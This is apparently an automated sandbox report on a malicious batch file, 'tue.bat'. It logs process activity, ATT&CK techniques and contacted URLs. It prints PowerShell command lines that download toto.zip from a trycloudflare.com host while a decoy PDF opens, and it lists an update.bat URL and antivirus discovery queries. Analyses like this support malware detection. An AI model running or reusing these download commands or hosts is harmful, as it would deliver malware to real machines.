Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2080Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1494
Source: C:\Windows\System32\timeout.exe TID: 6564Thread sleep count: 33 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 2080 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 161 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep count: 2933 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316Thread sleep count: 1494 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000009.00000002.1466132369.0000017AB0F85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -outfile 'c:\users\user\downloads\toto.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542331 Sample: tue.bat Startdate: 25/10/2024 Architecture: WINDOWS Score: 48 27 michael-scanned-motherboard-reforms.trycloudflare.com 2->27 29 x1.i.lencr.org 2->29 31 3 other IPs or domains 2->31 35 AI detected suspicious sample 2->35 9 cmd.exe 3 2 2->9         started        signatures3 process4 signatures5 37 Suspicious powershell command line found 9->37 12 Acrobat.exe 74 9->12         started        14 timeout.exe 1 9->14         started        16 powershell.exe 14 15 9->16         started        18 2 other processes 9->18 process6 process7 20 AcroCEF.exe 108 12->20         started        22 conhost.exe 14->22         started        process8 24 AcroCEF.exe 6 20->24         started        dnsIp9 33 96.7.168.138, 443, 49771 INTERNEXABRASILOPERADORADETELECOMUNICACOESSABR United States 24->33

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
tue.bat3%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://x1.i.lencr.org/0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://www.adobe.co0%URL Reputationsafe
http://crl.m0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    unknown
    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    217.20.57.18
    truefalse
      unknown
      michael-scanned-motherboard-reforms.trycloudflare.com
      unknown
      unknowntrue
        unknown
        x1.i.lencr.org
        unknown
        unknownfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1460970201.0000017AA905A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1460970201.0000017AA8F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1426512813.0000017A9A79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
            • URL Reputation: safe
            unknown
            https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip=powershell.exe, 0000000F.00000002.1489260870.000001B7B3650000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip~powershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://michael-scanned-motherboard-reforms.trycloudflare.com/update.battue.batfalse
                  unknown
                  https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipypowershell.exe, 00000009.00000002.1425903186.0000017A98920000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://go.microsoft.copowershell.exe, 0000000F.00000002.1554307719.000001B7CBD1F000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://michael-scanned-motherboard-reforms.trycloudflare.com/powershell.exe, 00000009.00000002.1465116825.0000017AB0EF3000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://go.micropowershell.exe, 00000009.00000002.1426512813.0000017A99AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B47E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.ziprpowershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipaApowershell.exe, 00000009.00000002.1424696724.0000017A96F3A000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://michael-scanned-motherboard-reforms.trycloudpowershell.exe, 00000009.00000002.1425548377.0000017A97214000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489105074.000001B7B1E64000.00000004.00000020.00020000.00000000.sdmptrue
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1489704119.000001B7B544B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://michael-scanned-motherboard-reforms.trycloudflare.com/34e089powershell.exe, 0000000F.00000002.1554307719.000001B7CBD7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.adobe.coReaderMessages.4.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.mpowershell.exe, 0000000F.00000002.1556543840.000001B7CBFD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://michael-scanned-motherboard-reforms.trycloudflare.compowershell.exe, 00000009.00000002.1426512813.0000017A99AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B47E3000.00000004.00000800.00020000.00000000.sdmptrue
                                      unknown
                                      https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipVpowershell.exe, 00000009.00000002.1465793067.0000017AB0F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zippowershell.exe, 0000000F.00000002.1488145955.000001B7B1C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1556543840.000001B7CBFF6000.00000004.00000020.00020000.00000000.sdmp, tue.battrue
                                          unknown
                                          https://contoso.com/powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1460970201.0000017AA905A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1460970201.0000017AA8F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1426512813.0000017A9A79B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B5596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1547034981.000001B7C3C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://oneget.orgXpowershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip7upowershell.exe, 0000000F.00000002.1556543840.000001B7CBFA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aka.ms/pscore68powershell.exe, 00000009.00000002.1426512813.0000017A98EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B3BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1426512813.0000017A98EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B3BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://oneget.orgpowershell.exe, 00000009.00000002.1426512813.0000017A9A4B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1489704119.000001B7B51A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
